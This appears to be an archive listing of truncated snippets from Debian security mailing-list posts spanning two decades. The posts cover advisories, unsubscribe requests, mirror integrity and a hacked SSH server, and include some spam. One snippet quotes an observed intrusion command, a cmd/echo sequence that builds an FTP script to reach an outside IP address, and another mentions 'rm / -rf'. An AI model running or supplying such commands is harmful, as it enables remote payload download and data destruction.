Re: Should Debian ask for a CPE when a CVE in Debian is found?

tes that "Purl is currently in use as a de facto standard in many situations" and the value of using DNS-based approaches (purl is one). --- David A. Wheeler

I Joined This List

t going to bother jumping through hoops just to appease them. Anyone who's interested in Debian security matters should subscribe to the mailing list or read its archives in a Web browser at the very least. -- David Campbell

Re: dpkg MD5

Nope, but I thought that may be a way to make check summing more useful. On 11/7/24 17:08, Jonathan Hutchins wrote: Do you have any evidence that there has been an attempt to post bogus packages to the official mirrors? -- David Campbell

dpkg MD5

ss in the CC if you respond to this message. I am not subscribed to the mailing list. -- David Campbell

Re: not getting compromised while applying apt-get upgrade for CVE-2016-1252

g additional hurdle… [or you have a "trusted" (local) mirror] – you do perform checks, don't you? btw: debootstrap happens without apt being involved as you can bootstrap from basically any system – getting apt to run on any system while not entirely impossible is considerably harder and i

Re: Remove email

Hello, You need to send a mail to debian-security-requ...@lists.debian.org with "unsubscribe" as subject. You can also unsubscribe for some list here : https://www.debian.org/MailingLists/unsubscribe Best regards Le 31/03/2016 16:42, Tiffany Ryan a écrit : > > Please remove my email from you sys

Should Debian ask for a CPE when a CVE in Debian is found?

s for identification. More info on requesting CPEs here: https://nvd.nist.gov/cpe.cfm I thought I'd raise the idea. Thanks! --- David A. Wheeler signature.asc Description: signature.asc

Re: [SECURITY] [DSA 3438-1] xscreensaver security update

Hello, You can follow instructions on this URL: https://www.debian.org/MailingLists/#subunsub Or use this form : https://www.debian.org/MailingLists/unsubscribe Good bye Le 11/01/2016 00:04, David ISIDORE a écrit : > Hi, I'm not on Debian anymore. How can I unsubscribe from mail

Re: [SECURITY] [DSA 3438-1] xscreensaver security update

Hi, I'm not on Debian anymore. How can I unsubscribe from mailing list? 2016-01-10 20:08 GMT+01:00 Michael Gilbert : > -BEGIN PGP SIGNED MESSAGE- > Hash: SHA512 > > - - > Debian Security Advisory DSA-3438-1

RE: [SECURITY] [DSA 3386-2] unzip regression update

Salvatore Bonaccorso Sent: Wednesday, 11 November 2015 4:52 PM To: David McDonald Cc: 'debian-security@lists.debian.org' Subject: Re: [SECURITY] [DSA 3386-2] unzip regression update Hi Dave, On Tue, Nov 10, 2015 at 09:54:19PM +, David McDonald wrote: > Thank you Salvatore & Thijs

RE: [SECURITY] [DSA 3386-2] unzip regression update

rom: Salvatore Bonaccorso [mailto:salvatore.bonacco...@gmail.com] On Behalf Of Salvatore Bonaccorso Sent: Tuesday, 10 November 2015 8:46 PM To: David McDonald Cc: 'debian-security@lists.debian.org' Subject: Re: [SECURITY] [DSA 3386-2] unzip regression update Hi David, On Tue, Nov 10,

RE: [SECURITY] [DSA 3386-2] unzip regression update

Hi Salvatore, Your e-mail below states: "For the stable distribution (jessie), this problem has been fixed in version 6.0-16+deb8u2" (Note bene the last digit) However, https://www.debian.org/security/2015/dsa-3386 states: "For the stable distribution (jessie), these problems h

Re: [SECURITY] [DSA 3265-1] zendframework security update

Unsubscribe On 20 May 2015 at 05:37, David Prévot wrote: > -BEGIN PGP SIGNED MESSAGE- > Hash: SHA512 > > - - > Debian Security Advisory DSA-3265-1 secur...@debian.org > htt

Re: [SECURITY] [DSA 3149-1] condor security update

Hallo Günter Ich bim Stv. Security (bis Salvatore wieder da ist). Könntest Du prüfen, ob wir davon betroffen sind (s.u.)? Gruss David Schneider On 02.02.2015 19:50, Sebastien Delafond wrote: -BEGIN PGP SIGNED MESSAGE- Hash: SHA256

Re: [SECURITY] [DSA 3074-2] php5 regression update

, david -- To UNSUBSCRIBE, email to debian-security-requ...@lists.debian.org with a subject of "unsubscribe". Trouble? Contact listmas...@lists.debian.org Archive: https://lists.debian.org/546caccf.8070...@linux-france.org

Re: [SECURITY] [DSA 3074-2] php5 regression update

Hello, Le 19/11/2014 11:49, Yves-Alexis Perez a écrit : so people are advised to keep kernel symlink protection (sysctl fs.protected_symlinks=1) enabled as it is by default on Wheezy This setting is not set on my Wheezy machine. How can I set it permanently (i.e. across reboots). Best regard

Archive GPG key expiring process

after the attack happened with a new master key that would mean nobody could apt-get the debian-keyring package for the new public key. I am wondering if I am missing something. Is there a process for this possibility? Thanks -- David Hubner Software Engineer david.hub...@smoothwall.net

Re: about bash and Debian Lenny

Also about not thrusting people, you are sending to this list with your company email address and tell everyone here you have an exploitable qmail setup running. Be carefull with the information you make public. Regards, David 2014-10-01 14:17 GMT+02:00 David Dejaeghere : > With Qmail expo

Re: about bash and Debian Lenny

With Qmail exposed and being an attack vector I would advice to build your own updated bash package. You wont get official security updates. 2014-10-01 14:06 GMT+02:00 Nikolay Hristov : > On 10/01/2014 02:58 PM, Konstantin Khomoutov wrote: > >> On Wed, 1 Oct 2014 14:45:55 +0300 >> Nikolay Hristov

Re: about bash and Debian Lenny

hellshock alone with Debian Lenny in its current state. If you need to secure your old boxes you will have to look for alternative methods outside of supported packages. Think about improved firewalling. What attack vectors of the shellshock exploit are worrying to you? Regards, David 2014-1

Re: Checking for services to be restarted on a default Debian installation

in the loop (for translation call coordination, or even i18n help if needed) if you wish to. Regards David signature.asc Description: OpenPGP digital signature

Re: Checking for services to be restarted on a default Debian installation

Le 07/09/2014 10:54, Paul Wise a écrit : > On Sun, Sep 7, 2014 at 9:30 PM, David Prévot wrote: >> How does it work if the upgrade run in the background? Will all needed >> service be restarted without asking? (If so, the gdm3 restart issue may >> be a blocker). > > No

Re: Checking for services to be restarted on a default Debian installation

ault installation? Are there drawbacks? Not restarting by default the DM seems to be nice thing to have. How does it work if the upgrade run in the background? Will all needed service be restarted without asking? (If so, the gdm3 restart issue may be a blocker). Regards David signature.asc Description: OpenPGP digital signature

Re: Checking for services to be restarted on a default Debian installation

rity-update Regards David signature.asc Description: OpenPGP digital signature

Re: Please remove me from this list

Le 26/06/2014 16:06, Jason Fergus a écrit : > Ha ha, made me laugh. > > Speaking of lists, I wish I knew how Evolution knows to ask if one would > like to reply to the list or the sender. My work uses a bunch of > mailing lists, and I always feel like I'm breaking list etiquette when I > have to

Re: Debian mirrors and MITM

Le 30/05/2014 22:02, Henrique de Moraes Holschuh a écrit : > On Fri, 30 May 2014, Erwan David wrote: >> Le 30/05/2014 21:30, Joey Hess a écrit : >>> Alfie John wrote: >>>> Taking a look at the Debian mirror list, I see none serving over HTTPS: >>>> ht

Re: Debian mirrors and MITM

Le 30/05/2014 21:30, Joey Hess a écrit : > Alfie John wrote: >> Taking a look at the Debian mirror list, I see none serving over HTTPS: >> >> https://www.debian.org/mirror/list > https://mirrors.kernel.org/debian is the only one I know of. > > It would be good to have a few more, because there ar

Re: Debians security features in comparison to Ubuntu

Le 17/05/2014 18:38, Jan Moskyto Matejka a écrit : >> I might be misinterpreting your definition of "meaningful", but I >> have been looking for a public entropy source for my Debian system >> for quite a while. If you can point me to the Debian equivalent of >> pollinate and https://entropy.ubuntu

Re: finding a process that bind a spcific port

On Wed, Jan 22, 2014 at 02:33:27PM CET, Nico Angenon said: > no output > > Thanks for all... > > Nico You may also try lsof -i udp:10001 Launch it as root, because a normal user cannot see the descriptors of processes owned by others. -- To UNSUBSCRIBE, email to debian-security-requ...

Re: MIT discovered issue with gcc

On 13Nov27:2356+1100, Scott Ferguson wrote: > On 27/11/13 23:37, David L. Craig wrote: > > On 13Nov27:1423+1100, Scott Ferguson wrote: > > > >> On 27/11/13 13:49, David L. Craig wrote: > > > >>> On 13Nov26:1545-0500, David L. Craig wrote: > >

Re: MIT discovered issue with gcc

On 13Nov26:1545-0500, David L. Craig wrote: > On 13Nov26:1437-0500, Mark Haase wrote: > > > Therefore, a Linux distribution has 2 choices: (1) wait for upstream > > patches for bugs/vulnerabilities as they are found, or (2) recompile all > > packages with optimizations

Re: MIT discovered issue with gcc

On 13Nov26:1437-0500, Mark Haase wrote: > Therefore, a Linux distribution has 2 choices: (1) wait for upstream > patches for bugs/vulnerabilities as they are found, or (2) recompile all > packages with optimizations disabled. I don't think proposal #2 would get > very far... Well, there's always

Re: [SECURITY] [DSA 2758-1] python-django security update

Salvatore Bonaccorso wrote: >-BEGIN PGP SIGNED MESSAGE- >Hash: SHA512 > >- - >Debian Security Advisory DSA-2758-1 secur...@debian.org >http://www.debian.org/security/ Salvatore

Re: (Case MB46439) [SECURITY] [DSA 2641-2] libapache2-mod-perl2 update related to DSA 2641-1

I hope that is a golden ticket. I want to visit the chocolate factory! 2013/3/20 Mythic Beasts > Thank you for your mail to Mythic Beasts Support. Your query has been > received, and we will respond shortly. Please preserve the case number > in the subject line of any replies regarding this ti

Re: NULL Scan issues or something else?

On Fri, Feb 08, 2013 at 02:06:48PM CET, Daniel Curtis said: > Hi Mr Erwan > > So, everything is okay? Even these strange logs > mentioned earlier? I'm still curious about this rule; > SYN,RST, ACK,FIN, PSH,URG, SYN,RST,ACK, > FIN,PSH,URG > > What do you mean by writing, that I should not contac

Re: NULL Scan issues or something else?

Le 07/02/2013 21:22, Daniel Curtis a écrit : Hi, >>//(...)/Nothing that should bother you. / Okay, so far so good. But what about the rest of IP addresses, which occurred in logs? You have mentioned about a /bendel.debian.org / website. I wonder why? Because that's the

Re: NULL Scan issues or something else?

Le 07/02/2013 19:34, Daniel Curtis a écrit : Hi Thank you all for your answers. They are very helpful. I have to mention some thing, which I forgot to write; * no running services * all ports are closed (according to e.g. nmap) * iptables has concerning rules about /INVALID/ packets * f

Re: Use of DSA number for general announcements

Hi, Le 14/09/2012 01:47, Thijs Kinkhorst a écrit : > On Fri, September 14, 2012 03:28, David Prevot wrote: >>> This is a notice to inform you, that our previous PGP/GPG key expired. >> >> Thanks for notifying us on debian-security-announce@l.d.o, but I >> disa

Use of DSA number for general announcements (was: [DSA 2548-1] Debian Security Team PGP/GPG key change notice)

blicity team next time you prepare a big announcement. Regards David -BEGIN PGP SIGNATURE- Version: GnuPG v1.4.12 (GNU/Linux) iQIcBAEBCAAGBQJQUoguAAoJELgqIXr9/gny8xEP/jT7oCPsYppRuK5nsD5Mjg5K qPE8R6JZM/98okBQGmRE8X8kSC6Iz08+bwN11SfoBqw3j3mrZCEMUQG244oMnW3L I02Qq0s9ixwBCnPHGlLCn5R5tVjv9G5DcG4DkH

Bug#685646: Please advise a reliable version scheme for {stable,testing}{,-security}

t: fwiw, at least until I change my mind I'd say $c > $c-p-u > t > tpu […] 16:44 < adsb> using the codename everywhere would have saved a bit of pain with e.g. security updates which were prepared for lenny-as-stable but not published until after the squeeze release for some reas

Re: sun-java6-plugin outdated and vulnerable to an actively exploited security issue

On Thu, Aug 16, 2012 at 11:37:09AM CEST, Thijs Kinkhorst said: > Hi Adam, > > On Thu, August 16, 2012 07:56, echo083 wrote: > > The sun-java6 in the stable branch is the version 1.6.0_26 is there a > > plan for any security upgrade ? > > I'm afraid that's not possible. Oracle has changed licens

Re: [SECURITY] [DSA 2523-1] globus-gridftp-server security update

-BEGIN PGP SIGNED MESSAGE- Hash: SHA256 Le 08/08/2012 20:25, Mike Mestnik a écrit : > On 08/06/12 22:47, maestro wrote: >> #please unsubscribe me from this list >> # i do not find any link to do so. >> # thank you. >> > Instructions can be found at the bottom, there is no link or URL. Act

Security Implications of DKMS?

ble to avoid? Is this limiting the use of DKMS? How are you balancing the convenience (now sometimes "need") of DKMS vs the risk of having compliers on servers? If your saying "no," how are you getting the modules onto your secure systems? If this is a "solved

Re: Debian Oval definitions for 2011

nitions-2011.xml Thanks for your hint, Javier (author of the script used to generate those) and the security team CCed to gather more information. Regards David -BEGIN PGP SIGNATURE- Version: GnuPG v1.4.11 (GNU/Linux) iQIcBAEBCAAGBQJOlHEAAAoJELgqIXr9/gnys3oP/3HNW18rC4fNT8E9Ixrs3JIw 4

Re: Debian LTS?

On 06/10/11 00:13, Sythos wrote: > On Wed, 05 Oct 2011 19:13:33 +0200 > wer...@aloah-from-hell.de wrote: > >> Hi all, >> >> a Debian LTS-Version would be so welcome and is definitly >> something that's missing for Debian. >> > > in 18 years Debian released 6 "stable", an avarage of 3 years be

Re: Debian LTS?

On 05/10/11 19:13, wer...@aloah-from-hell.de wrote: > Hi all, > > a Debian LTS-Version would be so welcome and is definitly something that's > missing for Debian. > > best, > Werner Isn't it called "stable" ? -- To UNSUBSCRIBE, email to debian-security-requ...@lists.debian.org with a subj

Fwd: Application Icons Design

twitter ===8<==Original message text=== Hello David, >Timeframe is 3 weeks. It's possible to discuss a budget next week with skype, >Please try to ask the following icon designer: >debian-security@lists.debian.org ===8<===End of o

Re: AUTO: Steve Bownas is out of the office. (returning 09/06/2011)

-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 Are we going to receive those every time he is out of the office? I hope someone will do something about it... On 2011-08-21 16:17, Steven Bownas wrote: > > I am out of the office until 09/06/2011. > > I will be out of the office from Mon Aug 22 thro

Re: CVE Exploit

On Fri, Mar 11, 2011 at 04:08:29PM CET, Mike! said: > On 03/11/2011 04:06 PM, Jordon Bedwell wrote: > >On 3/11/2011 9:04 AM, Andrey Rahmatullin wrote: > >>On Fri, Mar 11, 2011 at 09:42:17AM -0500, hans wrote: > >>>rm / -rf worked fine last time I tried it on a VM as an experiment. > >>It was fixed

No DSA for isc-dhcp

Thanks in advance if you could fix this. Regards David -BEGIN PGP SIGNATURE- Version: GnuPG v1.4.11 (GNU/Linux) iQIcBAEBCAAGBQJNcY+AAAoJELgqIXr9/gnykEgQALEm6jwCTY2kwjFs7DnJfa3H jqJ3HCk/HpRbaG+PIezrb83+jyg3Ahnv4IgvXa7QrSblcnz7+cBrdJmfH+cYaiAp 5QJ+KtB3rYbpyKzyecmV9sEnMhjN6C5YL8wyy

download video aulas cursos a distancia online

video aula online download de video aulas: Visite: http://www.cursoemvideoaulas.com download video aulas cursos a distancia online, video aula online download de video aulas, aulas canto aula violino, como fazer sushi video dança, video aula guitarra video dança do ventre, aula video direito vi

My dear friend!

mate, and I believe I am worth to find my happiness here. I hope after reading this letter you are still interested in me:) I will be waiting for your answer! Please write me on this address: drthressydav...@yahoo.com I love you so much, Dr Thressy

Re: "unprivileged users may hijack forwarded X connections"

patch. -- David Ehle Computing Systems Manager CAPP CSRRI rm 077 LS Bld. IIT Main Campus Chicago IL 60616 [EMAIL PROTECTED] 312-567-3751 He who fights with monsters must take care lest he thereby become a monster. And if you gaze for long into an abyss, the abyss gazes also into you. On Tue, 29 Apr

"unprivileged users may hijack forwarded X connections"

anyone know if this has been addressed? Are there any plans to do so? Thanks! -- David Ehle Computing Systems Manager CAPP CSRRI rm 077 LS Bld. IIT Main Campus Chicago IL 60616 [EMAIL PROTECTED] 312-567-3751 He who fights with monsters must take care lest he thereby become a monster. And if yo

Re: Re: Is oldstable security support duration something to be proud of?

Please take this discussion off list. It has nothing to do with security. Take it to some list that has has to do with debian policy, announcements, the web-page or anyplace else where it might be relevent. Great job Security team. Thanks for all your work. -- David Ehle Computing Systems

Re: [SECURITY] [DSA 1479-1] New Linux 2.6.18 packages fix several vulnerabilities

Moe sir what is the code for the phone I'm havin a brain fart -Original Message- From: [EMAIL PROTECTED] To: [EMAIL PROTECTED] [EMAIL PROTECTED] BCC: David Nowak <[EMAIL PROTECTED]> Creation Date: 1/29 1:04 pm Subject: [SECURITY] [DSA 1479-1] New Linux 2.6.18 packages

Debian suggestion on File Deletion

would ask for a password every time you would want to delete a file. To my knowledge, today the only way of protecting files in a similar way is to create different user profiles with different permissions. Hope you will take my suggestion into account. Regards, David

Restrict remote access by time?

the criteria, I would welcome any suggestions, research leads, or input from those who have put together similar projects. Thanks in Advance! David. -- David Ehle Computing Systems Manager CAPP CSRRI rm 077 LS Bld. IIT Main Campus Chicago IL 60616 [EMAIL PROTECTED] 312-567-3751 He who fights

Re: spooky windows script

On Tue, 2007-05-08 at 14:57 +0200, Jan Outhuis wrote: > Hello, > > Recently I'm repeatedly being pestered by a strange event while surfing the > net. My cursor is taken over and the following code is typed: > > %systemroot%\system32\cmd.exe > cmd /c echo open 59.31.153.120 22783 >> ik &echo user

Re: [SECURITY] [DSA 1195-1] new openssl096 packages fix denial of service

+a1A1Bu9FvJ2AH1d6a D/j/V2QpP54= =AVqq -END PGP SIGNATURE- -- Regards, /"\ David Kennedy CISSP \ / ASCII Ribbon Campaign Protect what you connect; X Against HTML Mail Look both ways before crossing the Net. / \ -

Re: About GPG-signing the public RSA keys of Debian machines

On Tue, 2006-10-10 at 22:24 +0200, Joerg Jaspert wrote: > On 10803 March 1977, Kurt Roeckx wrote: > > > I assume you've used https and that you verified the certificate? > > And saw that it was issued by SPI? And then you looked up SPI's > > certificate? And you found that there is a text file

Re: About GPG-signing the public RSA keys of Debian machines

On Tue, 2006-10-10 at 21:57 +0200, Florent Rougon wrote: > [ I think debian-admin have read enough about my request by now, so if > you reply about verifying certificates and such, please consider > dropping the CC. Thanks. ] > > Kurt Roeckx <[EMAIL PROTECTED]> wrote: > > > See: > > http://l

Re: About GPG-signing the public RSA keys of Debian machines

On Tue, 2006-10-10 at 02:12 +0200, Joerg Jaspert wrote: > On 10802 March 1977, Florent Rougon wrote: ... > > > 2. I have to trust the integrity of db.debian.org. > > Signing the keys you would have to trust whoever signed it. Same thing. > I don't see that as being the same thing at all. W

Re: [SECURITY] [DSA 1172-1] New bind9 packages fix denial of service

it failed with: Sep 9 00:28:15 stan named[5638]: couldn't open pid file '/var/run/bind/run/named.pid': Permission denied Sep 9 00:28:15 stan named[5638]: exiting (due to early fatal error) I just had to change the 'bind' users group to the new bind group. Dave, -- Da

Re: "su -" and "su" - what is the real difference?

nment. So, I would be interested in hearing what the additional security implications would be. David. -- David Ehle Computing Systems Manager CAPP CSRRI rm 077 LS Bld. IIT Main Campus Chicago IL 60616 [EMAIL PROTECTED] 312-567-3751 He who fights with monsters must take care lest he thereby bec

AW: [SECURITY] [DSA 1048-1] New Asterisk packages fix arbitrary codeexecution

Wir verwenden glaub ich immer die aktuellste stable version. Lg. D -Ursprüngliche Nachricht- Von: Martin Schulze [mailto:[EMAIL PROTECTED] Gesendet: Montag, 01. Mai 2006 06:38 An: Debian Security Announcements Betreff: [SECURITY] [DSA 1048-1] New Asterisk packages fix arbitrary codeexec

Re: Pam module for hylafax

On Tue, 2006-04-18 at 17:39 +0400, Adarsh V.P wrote: > hi > i am using hylafax with debian sarge.I can only use the fax > utilites(sendfax,faxstat,...) while logging in as root. > Access is denied while trying to connect to the hylafax server from clients. > i just made a module called hylafax and

unsubscribe

-Mensaje original- De: Martin Schulze [mailto:[EMAIL PROTECTED] Enviado el: miércoles, 15 de marzo de 2006 9:43 Para: Debian Security Announcements Asunto: [SECURITY] [DSA 1002-1] New webcalendar packages fix several vulnerabilities -BEGIN PGP SIGNED MESSAGE- Hash: SHA1 - -

Re: Bonk vulnerability!

On Fri, 2006-03-03 at 13:01 -0700, Michael Loftis wrote: > > > --On March 3, 2006 10:01:54 AM -0800 Zakai Kinan <[EMAIL PROTECTED]> > wrote: > > > I just installed a server with sarge 3.1 and after > > testing it with nessus it is vulnerable to bonk. I am > > trying to figure out how that is

RE: Weird message in my apache error log

I've seen this type of thing with PHP; I was going to say something but I figured I would wait since you didn't mention it. Can you correlate the time/date/ip with the request from access.log? It might give you more information. I can say, that we get attacked regularly on Sarge and we're a rela

RE: Weird message in my apache error log

What does your application do? It looks like it is finding a shell script somewhere? We've seen similar things when executing CGI's and not filtering the input data so well. The line 22, 24 make me think there is a script somewhere rather than arbitrary GET data. > -Original Message- > F

Re: [SECURITY] [DSA 926-1] New ketm packages fix privilege escalation

Hej, jag har julledigt, och kommer inte tillbaka förrän måndagen den 2:a januari. För installationsärenden, maila [EMAIL PROTECTED] eller ring pay&read på 08-20 83 70 Med vänliga hälsningar, David Ahlard -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of "unsubscribe&

Re: help

On Sat, 2005-12-10 at 23:43 -0500, Luis A. Rondon Paz wrote: > > > > This email contains the help you requested. -davidc -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]

Re: unsubscribe

On Thu, 2005-10-13 at 01:28 +0200, Peter Palfrader wrote: > On Tue, 11 Oct 2005, Benjamin Maerte wrote: > > > -- > > To UNSUBSCRIBE, email to [EMAIL PROTECTED] > > with a subject of "unsubscribe". Trouble? Contact > > [EMAIL PROTECTED] > > > > Learn to read the mails you're replying to, will

Re: SELinux

On Thu, 2005-09-22 at 04:40 +1000, Arvind Autar wrote: > Helllo, > > I have been using debian for quite some time now, how ever I have > watched several distrobutions implentating so many great ideas, and I > have been wondering why such a robust distorbution as debian > GNU/Linux(*) hasn't done

Re: policy change is needed to keep debian secure

On Tue, 23 Aug 2005, Matt Zimmerman wrote: > On Tue, Aug 23, 2005 at 12:04:17PM -0500, David Ehle wrote: > > > As you can see in the subject, the OP understands the policy, but believes > > it should be changed. > > To what? The suggestions that I have seen so far se

Re: policy change is needed to keep debian secure

a package list fixed in amber can keep their system offline and not put the security line in their sources- as security will require changes at some level. I support introducting new packages when older versions can not be realisticly maintained with backported security fixes. -- David Ehle Co

Re: policy change is needed to keep debian secure

I second this post. Dan, Thank you for saying so clearly. On Sat, 20 Aug 2005, Daniel Sterling wrote: > Keeping Debian stable by not changing things is great. > > Except maybe its not so great when you're trying to maintain a complicated, > buggy, high profile program that handles sensitive use

Re: On Mozilla-* updates

woe-is-me-they-wont-play-like-i-like-i-hate-change fashion, and the situation either not be resolved or we do something stupid like drop mozilla. Just for the record I also vote against volitol. Security changes should go into stable proper. david. -- To UNSUBSCRIBE, email to [EMAIL PROTECTED]

Re: On Mozilla-* updates

rvers that can be used to build at least two of the architectures. David. -- David Ehle Computing Systems Manager CAPP CSRRI rm 077 LS Bld. IIT Main Campus Chicago IL 60616 [EMAIL PROTECTED] 312-567-3751 He who fights with monsters must take care lest he thereby become a monster. And if you gaz

Re: On Mozilla-* updates

analysis sytems we have over 75 "sit down" systems. Debian is MY opinion is as much a desktop distro as it is a server distro, and support for both is equally important. David. -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]

Re: On Mozilla-* updates

> Despite of the fact, the the release is probably unable to match the mozilla > release cycles - do you really think, mozilla is the one and only package, > debian is all about? Well, I mean the killer application, the thin that > justify Debian? > > Keep smiling > yanosz > For my end users, who

Re: "root login denied". But by what?

On Fri, Jun 17, 2005 at 10:47:49PM +0200, Marcin Owsiany wrote: > On Fri, Jun 17, 2005 at 07:33:02PM +0100, David Ramsden wrote: > > Does anyone know what generated the above log entries? > > try: > > find /usr/sbin /sbin /usr/local/sbin \ > /usr/bin /usr/local/bin

"root login denied". But by what?

he latest release of stable. Does anyone know what generated the above log entries? And why is there "no ip"? Regards, David. -- .''`. David Ramsden <[EMAIL PROTECTED]> : :' :http://david.hexstream.co.uk/ `. `'` PGP key ID: 507B379B on wwwkeys.pg

systemware, teachware and artware from sixty dollrs

www.shwpvragelsh7ta.aladfala9.com ranimé pour devant promenasses, devant. marrerez extérioriserons septentrionales sous exaucerions le sans pénètrent les désenivrâtes. sans doserez les corroborassions mais réclamassions sucrer au-dessus ce amoncellerais coulée sans déterminassions. devant réform

Security status of orphaned woody packages when upgraded to sarge?

even if you check debian security advisories diligently. -- David Stanaway <[EMAIL PROTECTED]> -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]

Re: User 501 and /usr/local

On Mon, 2005-05-09 at 07:30 -0700, JM wrote: > I guess what I was trying to say > should not this directory be owned by root and with a 755 permissions? > Default debian permissions on /usr/local are: drwxrwsr-x 11 root staff 115 2005-03-23 13:42 local -davidc -- It is not the mountain we

Re: Dns refresh

There is really no excuse for such egregious cross posting. Please send questions to apppropriate mailing lists only, preferably one at a time. On Wed, 2005-04-27 at 15:58 -0300, Servilink Santiago Francos wrote: > > Hello, I have a server and I changed the ip number of the server and > the name

Snort log stuff

Over the last few days, I've seen the following type of entry in my snort report: The distribution of event methods === %# of method === 5.81 5 (portscan) TCP Portsweep 3

Re: OT - was Re: My machine was hacked - possibly via sshd?

On Wed, 2005-03-30 at 21:35 +1000, Ivan Brezina wrote: > Let me point, that meanig of word "stable" is differnet for RedHat/SUSE. > Debian "stable" is more like "frozen" - no bugfixes, no new drivers > no new features. Just security fixes a and some "critical" fixes. > > RedHat "stable" is mor

Re: My machine was hacked - possibly via sshd?

On Wed, 2005-03-30 at 20:34 +1000, Matthew Palmer wrote: > On Wed, Mar 30, 2005 at 07:02:55PM +1000, David Pastern wrote: > > Redhat/Fedora/Suse/Mandrake are just plain silliness. However - there > > is a big difference between a one year release cycle, and the fact that > &g

Re: My machine was hacked - possibly via sshd?

On Wed, 2005-03-30 at 17:55 +1000, Andrew M.A. Cater wrote: > On Tue, Mar 29, 2005 at 05:08:32PM -0500, Noah Meyerhans wrote: > > On Wed, Mar 30, 2005 at 07:16:31AM +1000, David Pastern wrote: > > > And this, in reality, is why Woody is so old. I cannot imagine any > >

Re: My machine was hacked - possibly via sshd?

On Tue, 2005-03-29 at 15:25 -0500, Noah Meyerhans wrote: > On Tue, Mar 29, 2005 at 01:38:55PM +0100, Simon Heywood wrote: > > > Sorry, but this isn't correct. kernel 2.4.18-1 in woody is patched > > > against known vulnerability. > > > > The security team have quietly stopped updating it, prefer

Re: My machine was hacked - possibly via sshd?

On Tue, 2005-03-29 at 07:25 +1000, Malcolm Ferguson wrote: > Thanks for all the feedback everybody. It looks like an ssh dictionary > attack discovered a weak password, followed by a local root exploit > against an out-of-date kernel. From now on I will be sticking with an > official Debian st

Re: Analysis vulnerabilities associated to published security advisories, anyone?

tput here along with input and output. > > http://people.debian.org/~skx/2005/ Nice script. I fixed it up to sanitise 'sanitizations' and sort output by count. diff attached. Regards, David -- - hallo... wie gehts heute? - *hust* gut *rotz* *keuch* - gott sei dank kommunizieren

Re: Packet sniffing & regular users

Alvin Oga wrote: > ah .. good point ... i make no distinction between "local access" > vs "physical access" in that if the server is behind the locked > door, it'd be better than if its on the corp server in the next > open cubicle on the same cat 5 wires, hubs and switches etc Physical access mea

Re: Packet sniffing & regular users

Alvin Oga wrote: > no more telnet, no more pop3, no more wireless, no more > anything that is insecure Those are not insecure: using them unwisely is. Telnet over a VPN is just as secure as ssh with password authentication. The same goes for pop3/pop3s. Wireless is completely different

Re: Packet sniffing & regular users

s. keeling wrote: > Isn't it generally accepted that black hats who get local access (ie., > a user login account) is _much_ worse than black hats who've been kept > out? Assuming black hat wants root, taking over a user's account is a > very big first step. > > I would take the security of your u

Re: Packet sniffing & regular users

s. keeling wrote: > "... should be" != "are." Are you sure no-one there's using telnet, > ftp, & etc? If they send their confidential data unencrypted, that's not my fault, and there's not much I can do to stop them (even if I somehow make it impossible on my computers, they could still go to a li

Re: Packet sniffing & regular users

s. keeling wrote: > Do you understand what "anyone can see anything" really means? Have > you pumped tcpdump output into ethereal lately? > > "anyone can see anything" really means "anyone can see anything". > Think about it. And what's the real reason why you don't want to > bother with sudo? I'

  1   2   3   4   5   >